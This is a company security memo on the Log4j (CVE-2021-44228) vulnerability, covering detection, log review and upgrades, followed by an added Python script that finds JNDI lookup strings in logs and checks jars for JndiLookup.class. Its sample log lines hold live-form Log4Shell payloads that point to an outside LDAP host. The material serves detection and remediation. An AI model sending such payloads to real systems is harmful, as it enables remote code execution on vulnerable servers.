Log4j Vulnerability Update From Hyperproof
This is a memo from Hyperproof’s Security team written on Dec. 16, 2021. For additional questions, please contact the Hyperproof Security Team at firstname.lastname@example.org
Summary of vulnerability
A critical severity remote code execution vulnerability in Apache Log4j was published on Friday, December 10, 2021, in the NIST National Vulnerability Database (https://nvd.nist.gov/vuln/detail/CVE-2021-44228). An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
Detection of vulnerability
Hyperproof’s Information Security Team was notified of this vulnerability shortly after its publication on Friday, December 10th by our automated vulnerability scanning tools.
The Hyperproof engineering team was engaged and confirmed that Log4j was used in our Java backend service only.
Additionally, the team reviewed our application logs and intrusion detection logs to confirm that there were no attempts to leverage this exploit in the Hyperproof application.
Finally, we reached out to and confirmed with our sub-service providers that any use of Log4j had been upgraded to 2.15.0+ or mitigated by turning off JNDI.
Following the guidelines in the service advisory, we immediately upgraded our version to 2.15.0 and deployed it to our production environment at 4 pm PDT on December 10th. An additional recommendation was issued on Monday, December 13th to further secure Log4j. Although our investigations showed that there was no way to exploit JNDI in our local environment, we upgraded to 2.16.0 in an abundance of caution and deployed the fix to production on Tuesday, December 14th at 5 pm PDT.
We additionally updated to version 2.17.1 on Wednesday, December 29th to remain current, but the issue patched in that release did not affect our services.
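The two checks below correspond to the steps described above: reviewing application logs for exploitation attempts (a CVE-2021-44228 attempt leaves a `${jndi:...}` lookup string in whatever field was logged) and verifying that a Log4j jar no longer carries the JNDI lookup class, which is what "turning off JNDI" amounts to when the mitigation is applied by stripping `JndiLookup.class` from `log4j-core`. This is an added example, not Hyperproof code or part of the original memo; the log lines and the jar are constructed in memory so it runs offline, and the function names (`find_jndi_attempts`, `jar_has_jndi_lookup`, `build_fake_jar`) are this example's own.

```python
import io
import re
import zipfile
from typing import List, Tuple
from urllib.parse import unquote

# Log4j resolves "${name:value}" lookups inside log messages; the JNDI lookup
# is "${jndi:...}". Lookup names are case-insensitive, so the match is too.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(line: str) -> str:
    """Undo URL encoding so '%24%7Bjndi' is inspected as '${jndi'.

    Two passes cover double-encoded request fields as they appear in
    access logs; unquote() is a no-op on text that is not encoded.
    """
    return unquote(unquote(line))


def find_jndi_attempts(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line_number, line) for each log line carrying a JNDI lookup string."""
    return [
        (n, line)
        for n, line in enumerate(lines, start=1)
        if JNDI_LOOKUP.search(normalize(line))
    ]


# Path of the lookup class inside log4j-core; removing it from the jar is the
# documented mitigation when upgrading is not immediately possible.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def jar_has_jndi_lookup(jar_bytes: bytes) -> bool:
    """True if the jar (given as raw bytes) still ships JndiLookup.class."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        return JNDI_LOOKUP_CLASS in jar.namelist()


def build_fake_jar(include_jndi_lookup: bool) -> bytes:
    """Constructed stand-in for a log4j-core jar (entries are empty, no bytecode)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        jar.writestr("org/apache/logging/log4j/core/lookup/StrLookup.class", b"")
        if include_jndi_lookup:
            jar.writestr(JNDI_LOOKUP_CLASS, b"")
    return buf.getvalue()


# Constructed sample access-log lines (not from Hyperproof's logs); the
# User-Agent field is where the lookup string lands in lines 2 and 3.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /api/health HTTP/1.1" 200 "-" "curl/7.79.1"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "-" "%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.10%2Fa%7D"',
    '10.0.0.7 - - "POST /login HTTP/1.1" 302 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, line in find_jndi_attempts(SAMPLE_LOG):
        print(f"line {n}: JNDI lookup string: {line}")
    print("unmitigated jar has JndiLookup:", jar_has_jndi_lookup(build_fake_jar(True)))
    print("mitigated jar has JndiLookup:  ", jar_has_jndi_lookup(build_fake_jar(False)))
```

Run against real data, `find_jndi_attempts` takes the lines of an access or application log and `jar_has_jndi_lookup` takes the bytes of the deployed `log4j-core` jar; a hit from the first is a reason to pull the surrounding request context, and `True` from the second on a jar you believed mitigated means the mitigation was not applied to that artifact. Note that the lookup check only confirms the class is absent; on an upgraded release (2.16.0 and later, where JNDI is disabled by default) the class may still be present without being reachable, so the version of the jar is the primary signal and this check is a secondary one.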